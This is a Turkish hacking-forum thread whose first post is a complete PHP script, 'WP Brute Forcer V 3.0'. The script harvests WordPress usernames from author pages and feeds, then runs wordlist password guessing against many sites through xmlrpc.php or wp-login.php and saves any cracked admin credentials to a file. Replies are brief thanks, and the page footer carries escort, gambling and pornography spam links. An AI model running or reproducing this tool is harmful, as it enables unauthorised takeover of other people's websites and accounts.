Konu Bilgileri
Konu: WP Brute Forcer V 3.0 Yazar: sniffer
Okunma: 1073 Yorum: 3
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Kod:
<?php

error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '640000M');

echo"

[#]=============================[#]
[#]  WP Brute Forcer V 3.0      [#]
[#]                                            [#]
[#]  MaDe By Islam ..              [#]
[#]  Last Update : 26/5/2015    [#]
[#]=============================[#]

";

echo "\n(Enter Sites List) => ";
$list_s  = array_unique(@explode("\n",trim(@file_get_contents(trim(fgets(STDIN,1024))))));
$count_s = count($list_s);

echo "(Enter wordlist)   => ";
$pass_file = trim(fgets(STDIN,1024));

if(file_exists($pass_file)){
$list_w  = array_unique(@explode("\n",trim(@file_get_contents($pass_file))));
$count_w = @count($list_w);

         sleep(1);
         echo "\n[*] $count_s site and $count_w password loaded \n";
         sleep(1);
   echo "\n[*] Cracking ... \n\n";
}else{
         echo "[*] not found wordlist file \n";
   exit();
}

   function save($site,$user,$pass){
       $fo = fopen("jh.txt","a+");
       fwrite($fo,"[+] $site/wp-admin\n    $user:$pass\n\n");
       fclose($fo);    
      }

function curl($url,$POSTFIELDS = null,$headers = array()){
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_URL, $url);
curl_setopt($ch2, CURLOPT_HTTPHEADER, $headers);
       curl_setopt($ch2, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
     curl_setopt($ch2, CURLOPT_HEADER, 0);
    curl_setopt($ch2, CURLOPT_TIMEOUT,10);
       curl_setopt($ch2, CURLOPT_CONNECTTIMEOUT,10);
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 1);
       curl_setopt($ch2, CURLOPT_COOKIEJAR,  getcwd()."./wp-cookie.txt");
       curl_setopt($ch2, CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
    curl_setopt($ch2, CURLOPT_ENCODING, "gzip, deflate, compress");
    curl_setopt($ch2, CURLOPT_POST, TRUE);
curl_setopt($ch2, CURLOPT_POSTFIELDS, $POSTFIELDS);
     $exec = curl_exec($ch2);
     curl_close($ch2);
    return $exec;
    }

function admin_user($site){
    $guser = curl($site."/?feed=atom");
$user2 = get_users($site);
    if(preg_match('#<name>(.*?)</name>#', $guser, $username22)){
    if(strlen($username22[1]) > 0 && strlen($username22[1]) <= 15)
    array_push($user2,$username22[1]);
return array_unique($user2);
    }else{
       $guser = curl($site."/?author=1");
    if(preg_match('#<title>(.*?)</title>#', $guser, $username22)){
    $author = explode(' |', $username22[1]);
array_push($user2,$author[0]);
    return array_unique($user2);
    }else
array_push($user2,'admin');
    return array_unique($user2);
    }}

   function get_users($site){
    $c = 1; $u_arr = array();
       while(1){
if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i',@file_get_contents($site.'/?author='.$c),$users))
   array_push($u_arr,$users[1]);
else{
   return $u_arr;
   break;
}
$c++;
}}

foreach($list_s as $site){
   $site = trim($site);

$admin_user  = admin_user($site);
$check = @get_headers($site."/xmlrpc.php");
$post_xmlrpc_f = "<methodCall>
                <methodName>wp.getUsersBlogs</methodName>
                <params>
                <param><value><string>adminnnn</string></value></param>
                <param><value><string>adminnnn</string></value></param>
                </params></methodCall>";
$headers_xmlrpc = array('Content-Type: application/x-www-form-urlencoded');  
$check_xmlrpc = curl($site."/xmlrpc.php",$post_xmlrpc_f,$headers_xmlrpc);      
$check_wp = curl($site."/wp-trackback.php");

if(preg_match("/need/i",$check_wp)){

foreach($admin_user as $user){
     $user !== "admin" ? array_push($list_w,$user,$user."123",$user.$user,"123".$user) : false;

if(preg_match("#200#",$check[0]) && !preg_match("#<string>parse error. not well formed</string>#i",$check_xmlrpc)){

   foreach($list_w as $pass){
       $pass = trim($pass);

       $isadmin       = '#<name>isAdmin</name>#';
       $post_xmlrpc_t = "<methodCall>
                       <methodName>wp.getUsersBlogs</methodName>
                       <params>
                       <param><value><string>$user</string></value></param>
                       <param><value><string>$pass</string></value></param>
                       </params></methodCall>";
     $login_xmlrpc = curl($site."/xmlrpc.php",$post_xmlrpc_t,$headers_xmlrpc);

if(preg_match($isadmin,$login_xmlrpc)){
      echo "[+] Password is : $pass\n";
      save($site,$user,$pass);
      break;
}else
      echo "[-] $site : ($user : $pass) => error\n";
      }}

else{
   foreach($list_w as $pass){
       $pass = trim($pass);
       $login_post = "log=$user&pwd=$pass&wp-submit=Giriю&redirect_to=$site/wp-admin/&testcookie=1";
       $login = curl($site."/wp-login.php",$login_post);

     if(preg_match("#profile.php#i",$login)){
       echo "[+] Password is : $pass\n";
       save($site,$user,$pass);
       break;
      }else
     echo "[-] $site : ($user : $pass) => error\n";
}}}
while($count_w < count($list_w))
     array_pop($list_w);
}}

file_exists("wp-cookie.txt") ? unlink("wp-cookie.txt") : false;

?>
[/quote]
Cevapla
#2
weraryu kali linux Açık Ağızlı Gülümseme
Lafla olmuyor bu işler icraat gerekiyor Açık Ağızlı Gülümseme
Ara
Cevapla
#3
belki birgün işime yarar Açık Ağızlı Gülümseme tsk..
Ara
Cevapla
#4
sdsdsd
Ara
Cevapla


WP Brute Forcer V 3.0 Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress Brute Force Python HeRoTurk 4 956 15.09.2021, Saat:17:59
Son Yorum: SADFASF
  Skype Brute Force Attack Asil_Mehmet 24 4,849 25.06.2021, Saat:00:14
Son Yorum: zifiri21
  Hmei7 Joomla templates beez Brute Force G3nzo 127 26,452 29.10.2020, Saat:01:57
Son Yorum: alonekoding
+18 Google Dork ve Brute Force ile Web Site Hackleme.... Trsz_kwT 38 8,773 12.12.2019, Saat:06:56
Son Yorum: ParaYattı
  BRUTE FORCE İLE SİTE HACKLEME GuneyyK 2 2,036 24.02.2019, Saat:19:55
Son Yorum: GuneyyK


mersin escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno escort izmit Extremely sexy foursome with a hot black babe Horny pornstar Heidi Mayne in hottest gangbang, facial porn scene antalya escort bursa escort konya escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort bodrum escort izmir escort